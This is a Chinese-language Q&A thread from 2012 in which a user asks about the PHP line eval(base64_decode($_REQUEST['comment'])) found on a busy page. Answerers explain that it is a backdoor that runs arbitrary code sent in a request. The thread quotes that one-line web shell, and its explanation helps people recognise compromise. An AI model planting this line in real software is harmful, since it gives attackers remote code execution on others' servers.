我需要理解下面的代码
eval(base64_decode($_REQUEST['comment']));
它利用了CPU,页面只包含这个代码
问问题
110 次
3 回答
4
这实际上可以运行任何东西,所以没有办法知道。它从 $_REQUEST['comment'] 获取输入,base64 对其进行解码,然后将其作为 PHP 代码运行。
例如,如果cGhwaW5mbygpOw==通过,它将执行phpinfo();.
附带说明一下,这些类型的代码片段通常是危险信号,通常用作后门。
于 2012-12-13T23:00:49.643 回答
1
此代码 base64_decodes 一些输入,然后将其评估为 PHP 代码。最终执行的内容取决于评论字段的内容。
于 2012-12-13T23:01:30.343 回答
1
我猜你发现这个插入到你页面的代码中,这意味着你的网站在某种程度上受到了损害。这意味着实际上任何人都可以编写任何PHP 代码来执行任何操作,base64_encode()并将其发布到您的站点的“评论”字段中,然后服务器将执行它。
当您真正注意到它正在使用大量资源时,它可能被用于向某人发送垃圾邮件或 DOS,但只要该代码存在,它就可能被用来破坏您的服务器。
基本上,如果您发现以它开头的东西eval(base64_decode(...将会做坏事。
资料来源:在一家网络托管公司担任系统管理员 5 年。
于 2012-12-13T23:12:51.747 回答